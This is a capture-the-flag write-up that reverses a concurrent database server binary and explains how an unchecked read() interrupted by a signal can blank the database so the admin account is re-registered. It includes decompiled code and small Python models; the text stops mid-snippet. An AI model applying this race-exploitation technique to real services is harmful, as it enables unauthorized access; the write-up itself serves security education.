Exploiting a tricky race condition

This is a writeup for the concurrent-safe-db challenge from HITCON 2025 CTF, which I played together with the Organizers.

The challenge was placed in the misc category, but it might as well have been placed into pwn, as you will see later.

On the surface, the challenge's name and description suggest database software that handles concurrency properly, but let's dive in to see whether that is really the case.

Initial reversing

The challenge gives us the server binary that we can also interact with remotely, so let's look at what it does in Ghidra.

main just calls another function, from which we can see 5 function calls. The (already renamed) function calls are as follows:

void start_chall(void)

{
  setup_sig_handler();
  init();
  create_admin_user();
  setup_sig_blocking();
  accept_clients(0x2253,handle_client);
  return;
}

setup_sig_handler generates a 64-byte random value, which init later uses to set up the sockets. It also sets an alarm for 180 seconds (3 minutes), after which the binary exits.

The signal handler function is triggered on SIGCHLD and SIGPIPE, and looks as follows:

void on_client_finish(void)

{
  long in_FS_OFFSET;
  uint local_18;
  __pid_t local_14;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  while (local_14 = waitpid(0,(int *)&local_18,1), 0 < local_14) {
    if ((local_18 & 0x7f) == 0) {
      LOCK();
      DAT_client_counter = DAT_client_counter + -1;
      UNLOCK();
    }
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

The function decrements the counter of clients connected to the server. As you can see, there's a LOCK-UNLOCK pair, which is how Ghidra's decompiler displays an instruction with a lock prefix. The prefix essentially turns the instruction it is attached to into an atomic instruction; you can read more about it here.

So we already see the first signs of concurrency handling in the binary.

The init function is responsible for setting up the temporary file for the database, as well as starting the reader and the writer thread, and setting up the communication between the threads and the DB.

Next up is the create_admin_user function. Let's look at how it works, to understand how the DB functions from the client's point of view.

void create_admin_user(void)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_209c;
  char local_2098 [65];
  byte abStack_2057 [8263];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  iVar1 = read_from_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  strncpy(local_2098,"admin",0x40);
  getrandom(abStack_2057,0x40,0);
  for (local_209c = 0; local_209c < 0x40; local_209c = local_209c + 1) {
    abStack_2057[local_209c] = abStack_2057[local_209c] % 0x5e + 0x21;
  }
  iVar1 = write_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The client downloads the entire database using read_from_db
The client makes modifications to the DB content as a whole directly and locally.
The client pushes the entire updated DB to the server with write_db

The admin user is added with a random 64-byte password in the ASCII range.
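The sizes scattered through the decompiled code fit together neatly. As a rough sketch (the constant names are mine; the 65-byte username comes from local_2098, while the 65-byte password is inferred from the 0x82 record size that shows up in register's memmove and from the 0x2080-byte reads in read_from_db), the layout can be checked like this:

```python
# Hypothetical names; all sizes are inferred from the decompiled output.
USERNAME_SIZE = 0x41   # local_2098 is char[65]
PASSWORD_SIZE = 0x41   # the password buffer starts 0x41 bytes after the username
RECORD_SIZE = USERNAME_SIZE + PASSWORD_SIZE
MAX_ACCOUNTS = 0x40
DB_SIZE = RECORD_SIZE * MAX_ACCOUNTS
VERSION_SIZE = 4
BUFFER_SIZE = DB_SIZE + VERSION_SIZE


def to_password_char(random_byte: int) -> int:
    """Mirror the loop in create_admin_user: map any byte into 0x21..0x7e."""
    return random_byte % 0x5E + 0x21


if __name__ == "__main__":
    print(hex(RECORD_SIZE), hex(DB_SIZE), hex(BUFFER_SIZE))
```

So a full DB buffer is 64 records of 0x82 bytes each, followed by 4 extra bytes, and every password character is printable, non-whitespace ASCII.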

The next setup function is setup_sig_blocking:

void setup_sig_blocking(void)
{
  long in_FS_OFFSET;
  sigset_t local_98;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  sigfillset(&local_98);
  pthread_sigmask(0,&local_98,(__sigset_t *)0x0);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Let's read what the pthread_sigmask function does, since I'm not too familiar with it.

The pthread_sigmask() function is just like sigprocmask(2), with the difference that its use in multithreaded programs is explicitly specified by POSIX.1. Other differences are noted in this page. For a description of the arguments and operation of this function, see sigprocmask(2).

It seems like this is a threaded version for the sigprocmask call, so let's read that one as well!

DESCRIPTION Refer to pthread_sigmask().

Well, wonderful, a cyclic reference.

However, the example in the pthread_sigmask man page is more useful!

The program below blocks some signals in the main thread, and then creates a dedicated thread to fetch those signals via sigwait(3). The following shell session demonstrates its use:

The call blocks some signals from reaching the calling thread, and in our case we can see it is initialized with sigfillset, so all signals would be blocked.

This will turn out to be quite an important part of the challenge, although initially it didn't seem to make sense. We've just looked at a signal handler for disconnecting clients, and with a debugger we could even verify that the signal handler was called, so clearly not all signals were blocked. It is also easy to dismiss this signal handling as just part of the challenge setup and not where the vulnerability lies.

Finally the binary will call accept_clients, which will be where we can interact with the challenge. This is just a standard socket server setup:

void accept_clients(short port,undefined *param_2)

{
  uint16_t uVar1;
  int iVar2;
  char *pcVar3;
  undefined6 in_register_0000003a;
  long in_FS_OFFSET;
  undefined4 local_58;
  socklen_t local_54;
  int local_50;
  int local_4c;
  sockaddr local_48;
  undefined local_38 [24];
  undefined8 local_20;

  local_20 = *(undefined8 *)(in_FS_OFFSET + 0x28);
  local_50 = socket(2,1,0);
  if (local_50 < 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_58 = 1;
  iVar2 = setsockopt(local_50,1,2,&local_58,4);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  memset(&local_48,0,0x10);
  local_48.sa_family = 2;
  local_48.sa_data._2_4_ = htonl(0);
  local_48.sa_data._0_2_ = htons(port);
  iVar2 = bind(local_50,&local_48,0x10);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar2 = listen(local_50,10);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  log(2,"Listening at 0.0.0.0:%d\n",CONCAT62(in_register_0000003a,port) & 0xffffffff);
  local_54 = 0x10;
  do {
    do {
      local_4c = accept(local_50,(sockaddr *)local_38,&local_54);
      uVar1 = ntohs(local_38._2_2_);
      pcVar3 = inet_ntoa((in_addr)local_38._4_4_);
      log(2,"Connection accepted from %s:%d\n",pcVar3,uVar1);
    } while (local_4c < 0);
    (*(code *)param_2)(local_4c);
  } while( true );
}

The server will then call a callback (param_2 - seems like I didn't rename this):

void handle_client(int fd)

{
  long lVar1;
  __pid_t _Var2;
  long in_FS_OFFSET;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  if (DAT_client_counter < 0x40) {
    DAT_client_counter = DAT_client_counter + 1;
    LOCK();
    UNLOCK();
    _Var2 = fork();
    if (_Var2 == 0) {
      prctl(1,9);
      close(DAT_db_fd);
      close(0);
      close(1);
      dup2(fd,0);
      dup2(fd,1);
      close(fd);
      handle_first_menu();
    }
    close(fd);
  }
  else {
    write(fd,"Server is busy\n",3);
    close(fd);
  }
  if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Here we see that a maximum of 64 clients are allowed, and, as in the client disconnection handler, we see the appearance of LOCK and UNLOCK. The decompiler is a bit tricked by the ASM here, but inspecting the assembly we see that the increment is safe (it is using a cmpxchg construction).

Client interaction

The first menu is as such:

1) register
2) login
3) bye

We can register a user, login and close the connection. Logging in will grant us access to the second menu, where we can do more.

The second menu:

1) logout
2) unregister
3) get flag
4) bye

logout - will take us back to the first menu
unregister - will remove the user we are currently logged in as
get flag - will check if our username is admin, and if so read the flag from the file system and send it to us
bye - will terminate the connection

So to get the flag we need to somehow log in as the admin user, but remember from the start that the admin user has a random 64-byte (ASCII) password, so we can't just log in as the admin user.

A logical next step is to investigate the login function, to see if there's any vulnerability which would allow the login without a correct password.

account * login(void)

{
  int mid;
  int iVar1;
  long in_FS_OFFSET;
  int bs_left;
  int bs_right;
  account *acc_found;
  char local_a8 [80];
  char local_58 [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Username: ");
  mid = __isoc23_scanf("%64s",local_a8);
  if ((mid != 1) || (local_a8[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  printf("Password: ");
  mid = __isoc23_scanf("%64s",local_58);
  if ((mid != 1) || (local_58[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  read_from_db(account_ARRAY_0010d5a0);
  acc_found = (account *)0x0;
  bs_left = 0;
  bs_right = 0x3f;
  while (bs_left <= bs_right) {
    mid = bs_right + bs_left >> 1;
    if (account_ARRAY_0010d5a0[mid].username[0] == '\0') {
      bs_right = mid + -1;
    }
    else {
      iVar1 = strncmp(local_a8,account_ARRAY_0010d5a0[mid].username,0x40);
      if (iVar1 == 0) {
        acc_found = account_ARRAY_0010d5a0 + mid;
        break;
      }
      if (iVar1 < 0) {
        bs_right = mid + -1;
      }
      else {
        bs_left = mid + 1;
      }
    }
  }
  if (acc_found != (account *)0x0) {
    mid = strncmp(local_58,acc_found->password,0x40);
    if (mid == 0) {
      printf("Login succeed. Hello %s!\n",acc_found);
      goto LAB_00103938;
    }
  }
  puts("Username or password not found");
  acc_found = (account *)0x0;
LAB_00103938:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return acc_found;
}

The function is a bit longer than the others, but here's an overview of what happens:

read username from the client
read password from the client
download the entire DB (remember earlier during the admin user creation, we always download the entire DB)
Binary search for the username given by the user (when inserting new users in register they always make sure to keep the DB sorted by username lexicographically ascending)
Check the password of the matched username using strncmp

It does not seem like there's anything exploitable here: neither the username nor the password from the user input can start with a null byte, and the binary search looks like a solid implementation. There also don't seem to be any concurrency issues, since we only download the DB, which already contains the admin user, and the only way to get a state without the admin user would require us to first log in and then unregister it.
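To convince ourselves that the lookup behaves as expected, here is a minimal Python model of the loop in login. The function name and the list-of-bytes representation are my own simplifications: an empty bytes object stands for a slot whose username starts with a null byte, and plain bytes comparison stands in for strncmp.

```python
from typing import List, Optional

MAX_ACCOUNTS = 0x40


def find_account(usernames: List[bytes], wanted: bytes) -> Optional[int]:
    """Return the slot index of `wanted`, mirroring the binary search in login."""
    left, right = 0, MAX_ACCOUNTS - 1
    while left <= right:
        mid = (left + right) >> 1
        name = usernames[mid]
        if name == b"":
            right = mid - 1          # unused slot: real entries are to the left
        elif wanted == name:
            return mid
        elif wanted < name:
            right = mid - 1
        else:
            left = mid + 1
    return None


if __name__ == "__main__":
    slots = [b"admin", b"bob"] + [b""] * (MAX_ACCOUNTS - 2)
    print(find_account(slots, b"admin"), find_account(slots, b"zed"))
```

Because unused slots always push the search to the left, the lookup only works while the used slots form a sorted prefix of the array, which is exactly the invariant register maintains.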

We can also check the register function for any vulns:

void register(void)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_b8;
  int local_b4;
  int local_b0;
  char username [80];
  char password [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Username: ");
  iVar1 = __isoc23_scanf("%64s",username);
  if ((iVar1 != 1) || (username[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  printf("Password: ");
  iVar1 = __isoc23_scanf("%64s",password);
  if ((iVar1 != 1) || (password[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_b8 = 0;
  do {
    if (4 < local_b8) {
      puts("Server is too busy");
LAB_001036d2:
      if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
        __stack_chk_fail();
      }
      return;
    }
    read_from_db(DAT_accounts);
    local_b0 = 0;
    local_b4 = 0;
    while ((local_b4 < 0x40 && (DAT_accounts[local_b4].username[0] != '\0'))) {
      iVar1 = strncmp(username,DAT_accounts[local_b4].username,0x40);
      if (iVar1 == 0) {
        puts("Username already exists");
        goto LAB_001036d2;
      }
      if (0 < iVar1) {
        local_b0 = local_b4 + 1;
      }
      local_b4 = local_b4 + 1;
    }
    if (local_b4 == 0x40) {
      puts("Too many users");
      goto LAB_001036d2;
    }
    memmove(DAT_accounts + (local_b0 + 1),DAT_accounts + local_b0,(long)(local_b4 - local_b0) * 0x82
           );
    memset(DAT_accounts + local_b0,0,0x82);
    strncpy(DAT_accounts[local_b0].username,username,0x41);
    strncpy(DAT_accounts[local_b0].password,password,0x41);
    iVar1 = write_db(DAT_accounts);
    if (iVar1 == 1) {
      puts("Success");
      goto LAB_001036d2;
    }
    local_b8 = local_b8 + 1;
  } while( true );
}

But again there doesn't seem to be anything exploitable.

username and password can't start with a null byte. The exploit here would be to register a user with a null byte as the first char, which would come before admin when sorted. Then we could register admin again, since the null byte indicates the end of the user list to the username search function.
we can't insert duplicate usernames, since the existing list of users is checked first
there's no off-by-one or such in the memmove that would allow to overwrite the admin user

Looking for the wrong race condition

Circling back to the challenge name and description, the bug must be something related to concurrency. However, we already saw the lock-prefixed instructions that keep the count of connected clients consistent.

A logical next step is to analyze the DB update mechanism itself, but there are quite a few limitations on this front as well.

The first major pain is the way that DB updates are done. The client fetches the entire DB and pushes the entire DB when an update needs to happen. That is, even if there was a race condition in how the DB is updated, we are always limited to changing the entire DB and not only parts of it.

Furthermore, analyzing the code we can see that all read_from_db calls are done to separate buffers. Functions such as register and login therefore do not share a buffer at all, which rules out the kind of vulnerability a shared buffer might have caused.

Let's look more into how DB writes are done:

void thread_writer(int param_1)

{
  int iVar1;
  long in_FS_OFFSET;
  char local_11;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_11 = '\x01';
  memset(account_ARRAY_00109440,0,0x2084);
  write(param_1,&local_11,1);
  log(3,"Reading data from the client...\n");
  read(param_1,account_ARRAY_00109440,0x2080);
  read(param_1,&DAT_0010b4c0,4);
  iVar1 = pthread_mutex_lock((pthread_mutex_t *)&DAT_db_mutex);
  if (iVar1 == 0) {
    local_11 = DAT_0010b4c0 == DAT_db_version;
    write(param_1,&local_11,1);
    if (local_11 == '\x01') {
      DAT_db_version = DAT_db_version + 1;
      log(1,"Writing data to the backing storage...\n");
      lseek(DAT_db_fd,0,0);
      write(DAT_db_fd,account_ARRAY_00109440,0x2080);
      fsync(DAT_db_fd);
      log(1,"Successfully writing data to the backing storage\n");
    }
    else {
      log(1,"Invalid data from client\n");
    }
    pthread_mutex_unlock((pthread_mutex_t *)&DAT_db_mutex);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

This is all done by the thread_writer function, which is the thread that handles writes to the database.

This reads the entire DB from the client (0x2080 bytes) as well as a 4 byte additional value. By also considering the read function, we know that the 4 byte value is like a DB version, initially set to 1, and as you can see in the thread_writer function incremented on every update.

Updates are only accepted if the DB version the client knows about matches the one the server knows about currently. Thus an update with a stale DB content would be rejected by the server.
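This is a classic optimistic concurrency scheme. As a toy model (the class and method names are hypothetical, and taking the lock in read is my assumption, since only the writer side is shown above), the accept/reject logic boils down to:

```python
import threading


class VersionedStore:
    """Toy model of the writer's compare-and-bump version check."""

    def __init__(self) -> None:
        self._lock = threading.Lock()
        self.version = 1              # the counter starts at 1
        self.data = b""

    def read(self):
        with self._lock:
            return self.data, self.version

    def write(self, data: bytes, client_version: int) -> bool:
        with self._lock:
            if client_version != self.version:
                return False          # stale snapshot: update rejected
            self.version = (self.version + 1) & 0xFFFFFFFF   # 4-byte counter
            self.data = data
            return True


if __name__ == "__main__":
    store = VersionedStore()
    _, seen_by_a = store.read()
    _, seen_by_b = store.read()
    print(store.write(b"from A", seen_by_a))   # first writer wins
    print(store.write(b"from B", seen_by_b))   # second one holds a stale version
```

Two clients that fetched the same snapshot cannot both push an update: whoever arrives second has to re-read and retry, which is what the retry loop in register does.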

Also notice how we have a pthread_mutex_lock call, once the thread starts to touch data that is considered a shared resource, such as the global DB content and the version counter.

They also take care of potential concurrency issues on the file system level, by doing fsync after the write.

So the chances of finding a concurrency issue here look pretty bleak, and we need to find some other way to exploit the system.

An unreasonable exploit

After staring a lot at the register and login functions, something occurred to me!

    read_from_db(DAT_accounts);
    local_b0 = 0;
    local_b4 = 0;
    while ((local_b4 < 0x40 && (DAT_accounts[local_b4].username[0] != '\0'))) {
      iVar1 = strncmp(username,DAT_accounts[local_b4].username,0x40);
      // [...]

Notice that in the register function, right after read_from_db returns, we immediately start walking through the user accounts that we supposedly received.

Now also take a look at how the writing is done a bit further below:

    iVar1 = write_db(DAT_accounts);
    if (iVar1 == 1) {
      puts("Success");
      goto LAB_001036d2;
    }
    local_b8 = local_b8 + 1;
  } while( true );
  // [...]

Notice how here, we account for the fact that a write could fail, and keep retrying (up to 5 times) before giving up. However, checks for the result of the read_from_db function are completely missing in both the register and the login functions.

Contrast this with the function which registers the admin user at the start:

  // [...]
  iVar1 = read_from_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  // [...]

Is this bug exploitable?

Let's understand what it means for the read_from_db to fail:

In case the account buffer for the given function has not been read into yet, we just end up with all null bytes for the account buffer.
In case the account buffer was read into previously, we keep the stale version of the DB, instead of updating it.

Now, how is this useful?

For login, we know it isn't:

logging in with an empty buffer means there are no users, hence the login fails
logging in with a stale buffer will still contain the admin user with the proper credentials

For register, however it could be useful:

registering with an empty buffer means there is no admin user, so we can create one with an arbitrary password.
registering with a stale buffer is not useful, as the admin user would be already there
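The difference between the two register cases can be modelled in a few lines. This is only a sketch of the insert step on a local snapshot; the helper name and the list-of-dicts representation are made up for illustration.

```python
from typing import Dict, List, Optional

Account = Dict[str, bytes]


def register(snapshot: List[Account], username: bytes, password: bytes) -> Optional[List[Account]]:
    """Return the snapshot that would be pushed back, or None if the name is taken."""
    if any(acc["username"] == username for acc in snapshot):
        return None                                   # "Username already exists"
    updated = snapshot + [{"username": username, "password": password}]
    return sorted(updated, key=lambda acc: acc["username"])


# A successful read (or a stale buffer) still contains the real admin.
with_admin = [{"username": b"admin", "password": b"<64 random bytes>"}]
# A failed read into a never-used buffer leaves it zeroed: no accounts at all.
empty_buffer: List[Account] = []

if __name__ == "__main__":
    print(register(with_admin, b"admin", b"hunter2"))
    print(register(empty_buffer, b"admin", b"hunter2"))
```

With the empty buffer, the snapshot that gets pushed back contains a single admin account whose password we chose.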

This would be an amazing exploitation idea if not for how DB updates work.

Recall from the previous section that thread_writer will first check the DB version and only accept the update if it matches the latest one on the server. In the case of the empty buffer - which we want to exploit - the DB version would also be uninitialized, and hence be zero. However, on the server the starting version is 1, which means that the server would reject the update that we can achieve by registering on top of the empty buffer.

Looking at the version counter, we see that it's a 4-byte value, so initially we might think about an overflow here, where a possible attack would look like:

Create around UINT_MAX updates to the DB, such that the counter becomes zero
Make the read call fail on register and register the admin user on top of the empty buffer (now the update is accepted, because the counter is zero)
login as the admin user and get the flag

The only issue is that even with minimal data in the requests it's a lot of data to transfer, and remember that we also have a time limit of 3 minutes before the server closes, because of the alarm.

So although in theory this would be an attack path, in practice the constraints imposed by the challenge do not allow us to pull this off.
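A quick back-of-the-envelope calculation shows how far out of reach this is. The numbers below only use values from the binary (a 4-byte counter starting at 1, the 180-second alarm, and 0x2080 + 4 bytes per accepted write); the variable names are mine.

```python
UINT32_MODULUS = 2 ** 32
START_VERSION = 1             # starting value of the server's counter
TIME_LIMIT_SECONDS = 180      # alarm set by setup_sig_handler

# Number of accepted updates until the counter wraps around to zero.
updates_needed = (0 - START_VERSION) % UINT32_MODULUS
updates_per_second = updates_needed / TIME_LIMIT_SECONDS

# Every accepted update pushes a full DB plus the version to the writer thread.
bytes_per_update = 0x2080 + 4
total_bytes = updates_needed * bytes_per_update

if __name__ == "__main__":
    print(f"{updates_needed} updates, about {updates_per_second:,.0f} per second")
    print(f"about {total_bytes / 2**40:.1f} TiB through the writer socket")
```

We would need roughly 24 million accepted updates per second, each one serialized through a single writer thread, before even counting the traffic between us and the remote.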

Before I continue, perhaps let's look into an aspect that I have not visited at the start of this section, namely how is it even possible for the read call to fail.

Making read fail

If we look at the read_from_db function, we can see execution paths where it returns something other than the success value of 1.

ulong read_from_db(void *param_1)

{
  ulong uVar1;
  long in_FS_OFFSET;
  byte local_15;
  int local_14;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_14 = connect_to_srv(&DAT_reader_conn);
  if (local_14 < 0) {
    uVar1 = 0xffffffff;
  }
  else {
    local_15 = 0;
    read(local_14,&local_15,1);
    if (local_15 == 0) {
      log(1,"Failed to read data from the DB\n");
    }
    else {
      log(3,"Reading data from the DB...\n");
      read(local_14,param_1,0x2080);
      read(local_14,(void *)((long)param_1 + 0x2080),4);
      log(2,"Successfully reading data from the DB\n");
    }
    close(local_14);
    uVar1 = (ulong)local_15;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar1;
}

If connection to the server fails, we return -1
If the server sends 0 as the first byte, we return 0

Outside of these 2 cases we always return the first byte we saw from the server.

For case 1 we have:

int connect_to_srv(undefined8 *param_1)

{
  long lVar1;
  int __fd;
  int iVar2;
  long in_FS_OFFSET;
  sockaddr socket_info;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  __fd = socket(1,1,0);
  if (__fd < 0) {
    __fd = -1;
  }
  else {
    memset(&socket_info,0,0x6e);
    socket_info.sa_family = AF_UNIX;
    socket_info.sa_data._0_8_ = *param_1;
    unique0x0000c300 = param_1[1];
    iVar2 = connect(__fd,&socket_info,0x6e);
    if (iVar2 != 0) {
      __fd = -1;
    }
  }
  if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
    return __fd;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Here we see the possibilities are:

Can't create a socket - this is pretty unlikely to happen
Can't connect to the server

It's important to note here that this server we are connecting to is not the socket server that is exposed as the remote for the challenge, but rather the 2 UNIX sockets that are created for the reader and the writer thread.

Let's look at how those sockets are set up:

void FUN_0010293e(undefined8 *param_1,code *callback)

{
  int __fd;
  int iVar1;
  sockaddr local_98;

  __fd = socket(1,1,0);
  if (__fd < 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  memset(&local_98,0,0x6e);
  local_98.sa_family = 1;
  local_98.sa_data._0_8_ = *param_1;
  unique0x0000c300 = param_1[1];
  iVar1 = bind(__fd,&local_98,0x6e);
  if (iVar1 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar1 = listen(__fd,10);
  if (iVar1 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  do {
    do {
      iVar1 = accept(__fd,(sockaddr *)0x0,(socklen_t *)0x0);
    } while (iVar1 < 0);
    (*callback)(iVar1);
    close(iVar1);
  } while( true );
}

A socket is created, but pay special attention to the backlog value of 10 in the listen call. After this, we just accept new connections in a loop and call the callback function, which is either the thread_reader or the thread_writer.

Importantly, the callback is already the function which will do the requested computation, and it doesn't fork or spawn a new thread. So for the duration the thread_writer or the thread_reader function is executing, there won't be any new clients accepted. Coupled with the observation about the backlog, this would make the connection to the server fail, and thus read_from_db would leave us with an empty buffer.

But as we noted already, the close to UINT_MAX DB updates make this attack route infeasible.

A similar attack at a different spot

After realizing this exact attack won't work for the register function, and in general anywhere where it could be useful, due to the DB version counter, I started looking elsewhere.

The core of the issue is that the return value of the read was not checked, therefore the computation went ahead with empty data. But perhaps there are other places in the binary where the result of a read call is not checked?

Let's turn our attention to thread_writer, which receives the DB contents from the client:

void thread_writer(int param_1)

{
  int iVar1;
  long in_FS_OFFSET;
  char local_11;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_11 = '\x01';
  memset(account_ARRAY_00109440,0,0x2084);
  write(param_1,&local_11,1);
  log(3,"Reading data from the client...\n");
  read(param_1,account_ARRAY_00109440,0x2080);
  read(param_1,&DAT_0010b4c0,4);
  iVar1 = pthread_mutex_lock((pthread_mutex_t *)&DAT_db_mutex);
  if (iVar1 == 0) {
    local_11 = DAT_0010b4c0 == DAT_db_version;
    write(param_1,&local_11,1);
    if (local_11 == '\x01') {
      DAT_db_version = DAT_db_version + 1;
      log(1,"Writing data to the backing storage...\n");
      lseek(DAT_db_fd,0,0);
      write(DAT_db_fd,account_ARRAY_00109440,0x2080);
      fsync(DAT_db_fd);
      log(1,"Successfully writing data to the backing storage\n");
    }
    else {
      log(1,"Invalid data from client\n");
    }
    pthread_mutex_unlock((pthread_mutex_t *)&DAT_db_mutex);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The functionality is quite straightforward:

Empty the buffer which it will use to receive the DB and the version counter from the client
Read the DB from the socket
Read the version counter from the socket
Persist changes to the global state, if the version counter matches

Critically, you may notice here that the results of both read calls are not checked. As such, if one of the calls failed and did not populate its buffer, we could end up with an inconsistent and possibly exploitable state.

Breaking the read for the version counter is useless: we would just have a mismatch compared to the server's view, and the update would be rejected.

Breaking the read call for the DB contents however, is quite useful, since we could essentially continue with an empty database if the version counter is correctly read afterwards. Subsequently, having an empty DB would allow us to register the admin user with a custom password, then log in and then get the flag.

Pulling this off, however, will be quite tricky. The version counter needs to match the server's, so we have to supply it, and therefore we can't make the read call fail by simply disconnecting the client socket.

The man page this time comes in handy however, by listing all the possible errors that could happen to the read call:

ERRORS
       EAGAIN The  file  descriptor  fd refers to a file other than a socket and has been marked nonblocking
              (O_NONBLOCK), and the read would block.  See open(2) for further details on the O_NONBLOCK flag.

       EAGAIN or EWOULDBLOCK
              The file descriptor fd refers to a socket and has been marked nonblocking (O_NONBLOCK), and  the  read
              would  block.   POSIX.1-2001  allows  either  error to be returned for this case, and does not require
              these constants to have the same value, so a portable application should check for both possibilities.

       EBADF  fd is not a valid file descriptor or is not open for reading.

       EFAULT buf is outside your accessible address space.

       EINTR  The call was interrupted by a signal before any data was read; see signal(7).

       EINVAL fd is attached to an object which is unsuitable for reading; or the file was opened with the  O_DIRECT
              flag, and either the address specified in buf, the value specified in count, or the file offset is not
              suitably aligned.

       EINVAL fd  was  created  via  a  call to timerfd_create(2) and the wrong size buffer was given to read(); see
              timerfd_create(2) for further information.

       EIO    I/O error.  This will happen for example when the process is in a background process group,  tries  to
              read from its controlling terminal, and either it is ignoring or blocking SIGTTIN or its process group
              is orphaned.  It may also occur when there is a low-level I/O error while reading from a disk or tape.
              A  further  possible cause of EIO on networked filesystems is when an advisory lock had been taken out
              on the file descriptor and this lock has been lost.  See the Lost locks section of fcntl(2)  for
              further details.

       EISDIR fd refers to a directory.

       Other errors may occur, depending on the object connected to fd.

Going through the list, most don't seem to be useful to us:

It's not a non-blocking fd, so those errors already don't apply
The output buffer is in valid address space
The fd is valid, not a directory and the underlying object (i.e the socket) supports reading

However EINTR seems quite interesting, it says:

The call was interrupted by a signal before any data was read; see signal(7).

So, if a signal happened to be raised while the read call is still being processed on the kernel side, we could make the read call fail, just for this one occasion. The race is quite tight: we only have time until the 0x2080 bytes are read from a UNIX socket, which should be relatively fast, but it is doable with some repetitions.
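The EINTR behaviour is easy to reproduce outside of the challenge. The sketch below is not taken from the binary: it blocks in read(2) on an empty pipe and lets SIGALRM interrupt it. It calls libc's read through ctypes because Python's own os.read transparently retries after EINTR, and it assumes a Linux-like system where it runs on the main thread.

```python
import ctypes
import errno
import os
import signal


def read_interrupted_by_signal() -> int:
    """Block in read(2) on an empty pipe, get interrupted, return the errno."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.read.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t]
    libc.read.restype = ctypes.c_ssize_t

    read_fd, write_fd = os.pipe()              # nothing is ever written to it
    buf = ctypes.create_string_buffer(0x2080)

    # Python installs its handlers without SA_RESTART, so the interrupted
    # syscall is not restarted by the kernel.
    old_handler = signal.signal(signal.SIGALRM, lambda signum, frame: None)
    signal.setitimer(signal.ITIMER_REAL, 0.1)
    try:
        ctypes.set_errno(0)
        result = libc.read(read_fd, buf, len(buf))
        err = ctypes.get_errno()
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)
        os.close(read_fd)
        os.close(write_fd)
    assert result == -1                        # the read failed without data
    return err


if __name__ == "__main__":
    print(errno.errorcode[read_interrupted_by_signal()])
```

The important detail is that the buffer is left untouched and nothing is consumed from the file descriptor, so code that ignores the return value carries on as if the data had arrived.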

We still have some open questions, before the exploit can work:

How do we make sure, the next read call will have the proper DB version counter value (otherwise the update is rejected)
How do we trigger signals, such that they would interrupt the read call

Let's tackle these points one by one.

Ensuring proper DB version counter

If the first read call fails, it means that all client data still in queue is available on the next call. This means that the next call will essentially read the first 4 bytes of the entire client data for this operation. That is, the first 4 bytes of the first username in the DB content coming from the client.
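To make this concrete, here is a small simulation with a socket pair. It is only a model of the two reads in thread_writer: the function name and the first_read_fails flag are mine, and the interrupted read is modelled by simply skipping it, since a read that fails with EINTR consumes nothing.

```python
import socket
import struct

DB_SIZE = 0x2080


def writer_view(payload: bytes, first_read_fails: bool):
    """Return (db_bytes, version) as the writer thread would end up seeing them."""
    client, server = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)
        db = bytes(DB_SIZE)                      # the buffer was memset to zero
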